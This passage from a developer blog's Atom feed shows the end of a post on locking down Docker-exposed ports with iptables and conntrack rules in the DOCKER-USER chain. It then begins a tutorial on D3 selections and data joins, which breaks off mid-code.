&lt;li&gt;Containers should be able to call out to the internet with impunity, which will require recieving some packets back&lt;/li&gt;
&lt;li&gt;Other interfaces, such as &lt;code&gt;tailscale0&lt;/code&gt; should be accepted by default&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What I did: added some iptables rules into the &lt;code&gt;DOCKER-USER&lt;/code&gt; filter. This is a chain added by Docker as a hook for user customisation.&lt;/p&gt;
&lt;p&gt;First we reset all our shenanigans:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; filter &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; FORWARD&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; PREROUTING&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;--table&lt;/span&gt; nat &lt;span class=&quot;token parameter variable&quot;&gt;--flush&lt;/span&gt; POSTROUTING&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;rm&lt;/span&gt; /etc/docker/daemon.json&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; systemctl restart &lt;span class=&quot;token function&quot;&gt;docker&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And we &lt;em&gt;could&lt;/em&gt; add these rules:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-I&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctstate&lt;/span&gt; RELATED,ESTABLISHED &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;--dport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;443&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DROP&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But that won&#39;t work because NAT &lt;em&gt;rewrites&lt;/em&gt; the destination ports. By the time our filters kick in, the destination port is &lt;em&gt;already&lt;/em&gt; 443 on the packet.&lt;/p&gt;
&lt;p&gt;Instead, this needs a stateful firewall. That&#39;s exactly what &lt;code&gt;conntrack&lt;/code&gt; does. It&#39;s another kernel module provided as part of the netfilter project, and will let us have knowledge of what our NAT-modified packet looked like before the switcheroo. Let&#39;s &lt;code&gt;sudo iptables --table filter --flush DOCKER-USER&lt;/code&gt; and give it another go. We want to match on the &lt;em&gt;original&lt;/em&gt; destination port of the packet &lt;em&gt;before&lt;/em&gt; we run it through NAT.&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-I&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctstate&lt;/span&gt; RELATED,ESTABLISHED &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-p&lt;/span&gt; tcp &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; conntrack &lt;span class=&quot;token parameter variable&quot;&gt;--ctorigdstport&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;443&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; ACCEPT&lt;br /&gt;&lt;span class=&quot;token function&quot;&gt;sudo&lt;/span&gt; iptables &lt;span class=&quot;token parameter variable&quot;&gt;-A&lt;/span&gt; DOCKER-&lt;span class=&quot;token environment constant&quot;&gt;USER&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-i&lt;/span&gt; ens3 &lt;span class=&quot;token parameter variable&quot;&gt;-j&lt;/span&gt; DROP&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That appears to have given me the behaviour I want, and I haven&#39;t had any crypto miners installed on my machine since. Looking forward to seeing what the hackers have planned for thanksgiving and christmas.&lt;/p&gt;
</content>
  </entry>
  <entry>
    <title>Understanding D3 Selections</title>
    <link href="https://martingaston.dev/articles/understanding-d3-selections/"/>
    <updated>2025-07-09T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/understanding-d3-selections/</id>
    <content xml:lang="en" type="html">&lt;script type=&quot;module&quot;&gt;
  import * as d3 from &quot;https://cdn.jsdelivr.net/npm/d3@7/+esm&quot;;
  window.d3 = d3
&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/bar.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/barRace.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/tree.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/generalUpdateGrid.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;module&quot; async=&quot;&quot; src=&quot;https://martingaston.dev/articles/understanding-d3-selections/components/appendRect.js&quot;&gt;&lt;/script&gt;
&lt;blockquote&gt;
&lt;p&gt;On this page, D3 is available globally. Explore in your browser&#39;s development tools as you read: try &lt;code&gt;d3.select(&amp;quot;table&amp;quot;)&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;D3 is a mature library with a rich history that&#39;s famously a bit scary. It&#39;s no wonder LLMs love it for data visualisation.&lt;/p&gt;
&lt;p&gt;To draw an SVG with three circles based off some data, the convention is this:&lt;/p&gt;
&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; circleData &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;400&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;700&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;r&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;50&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; svg &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; d3&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;select&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;svg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;circleData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;#FBFBFF&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;svg class=&quot;breakout&quot; id=&quot;svg-1&quot;&gt;
&lt;/svg&gt;
&lt;script type=&quot;module&quot;&gt;
const circleData = [
  { x: 100,  y: 100,  r: 50 },
  { x: 400, y: 100, r: 50 },
  { x: 700, y: 100, r: 50 }
];

const svg = d3.select(&quot;#svg-1&quot;).attr(&quot;width&quot;, &quot;100%&quot;).attr(&quot;viewBox&quot;, [0, 0, 800, 200]);

svg.selectAll(&quot;circle&quot;)
  .data(circleData)
  .join(&quot;circle&quot;)
  .attr(&quot;cx&quot;, d =&gt; d.x)
  .attr(&quot;cy&quot;, d =&gt; d.y)
  .attr(&quot;r&quot;,  d =&gt; d.r)
  .attr(&quot;fill&quot;, &quot;var(--text)&quot;)
&lt;/script&gt;
&lt;p&gt;When I started learning D3, this API boiled by brain. If you&#39;ve never used D3 before, read the code again and see how it resonates with you. If you &lt;em&gt;have&lt;/em&gt; used D3 before, try and remember whether you stumbled on some of its aspects.&lt;/p&gt;
&lt;p&gt;In my case, I really struggled with a few things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why do I have to &lt;code&gt;selectAll&lt;/code&gt; an element I &lt;em&gt;know&lt;/em&gt; doesn&#39;t exist in order to make new elements?&lt;/li&gt;
&lt;li&gt;Why do I explicitly have to state I&#39;m appending a circle in the &lt;code&gt;join&lt;/code&gt; method when I&#39;ve already mentioned I&#39;m selecting circles in &lt;code&gt;selectAll&lt;/code&gt;? Isn&#39;t that an unnecessary duplication?&lt;/li&gt;
&lt;li&gt;D3 has &lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt;, with the former grabbing the first matching DOM element and the latter selecting all matching elements. The &lt;code&gt;join&lt;/code&gt; method is used for saying &lt;em&gt;what&lt;/em&gt; you want to happen when &lt;code&gt;data&lt;/code&gt; is bound (the &lt;code&gt;circleData&lt;/code&gt; above). While the library won&#39;t explicitly error out, you will never see any example using &lt;code&gt;join&lt;/code&gt; with &lt;code&gt;select&lt;/code&gt;, only &lt;code&gt;selectAll&lt;/code&gt;. Why? Shouldn&#39;t it be possible to &lt;code&gt;select&lt;/code&gt; an element and &lt;code&gt;join&lt;/code&gt; &lt;em&gt;one&lt;/em&gt; item?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;All of these relate to D3&#39;s data join, which is both its secret sauce and most tricky quality. It&#39;s worth taking the time to understand what&#39;s going on and what I believe D3 is trying to achieve.&lt;/p&gt;
&lt;h2 id=&quot;why-d3%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-d3%3F&quot;&gt;Why D3?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;To understand better later, let&#39;s start by thinking about why we&#39;d want to use D3 in the first place. The Web APIs already have a way to create, select and manipulate elements in the DOM: &lt;code&gt;document.querySelector&lt;/code&gt; and &lt;code&gt;document.querySelectorAll&lt;/code&gt;. Why not just use those?&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;⚠️ D3&#39;s remit is much, much broader than manipulating the DOM, but in this article when we say D3 we are going to be solely focused on &lt;a href=&quot;https://d3js.org/d3-selection&quot;&gt;&lt;code&gt;d3-selection&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Consider this bar chart below. It&#39;s an &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; populated with a few &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; elements, with each bar showing the ⚽ goals scored by &lt;span class=&quot;mateta&quot;&gt;Jean Philippe-Mateta&lt;/span&gt;, &lt;span class=&quot;sarr&quot;&gt;Ismaïla Sarr&lt;/span&gt;, &lt;span class=&quot;eze&quot;&gt;Eberechi Eze&lt;/span&gt; and &lt;span class=&quot;munoz&quot;&gt;Daniel Muñoz&lt;/span&gt; in the 2024/25 Premier League season. You can interact with the chart to alternate between versions created by D3 and the standard Web APIs.&lt;/p&gt;
&lt;bar-intro class=&quot;breakout&quot;&gt;
&lt;/bar-intro&gt;
&lt;blockquote&gt;
&lt;p&gt;🔎 Explore the raw dataset by inspecting the &lt;code&gt;cpfcGoalscorers202425&lt;/code&gt; object from your browser&#39;s development tools&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You&#39;ll see two identical bar charts, both taking roughly ~30 lines of code to create. The primary difference comes from associating the &lt;code&gt;cpfcGoalscorers202425&lt;/code&gt; data with the chart.&lt;/p&gt;
&lt;p&gt;With the standard Web API, we iterate over the players, creating an SVG &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; for each of them and appending that to a parent &lt;code&gt;&amp;lt;g&amp;gt;&lt;/code&gt; element:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; g &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; document&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createElementNS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://www.w3.org/2000/svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;g&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;cpfcGoalscorers202425&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;player&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; bar &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; document&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createElementNS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://www.w3.org/2000/svg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;color&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; barWidth&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  bar&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;setAttribute&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  g&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;appendChild&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;bar&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; functions here are defined elsewhere, and map the values to the SVG coordinate space. We&#39;ll hand-wave those away as an implementation detail.&lt;/p&gt;
&lt;p&gt;Let&#39;s compare this with D3. We now have its famous &lt;code&gt;data&lt;/code&gt; and &lt;code&gt;join&lt;/code&gt; methods, and an API which opts for a more declarative style. You first bind &lt;code&gt;data&lt;/code&gt; to your selection, and then &lt;code&gt;join&lt;/code&gt; the data to elements:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;svg&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;g&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cpfcGoalscorers202425&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;color&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token 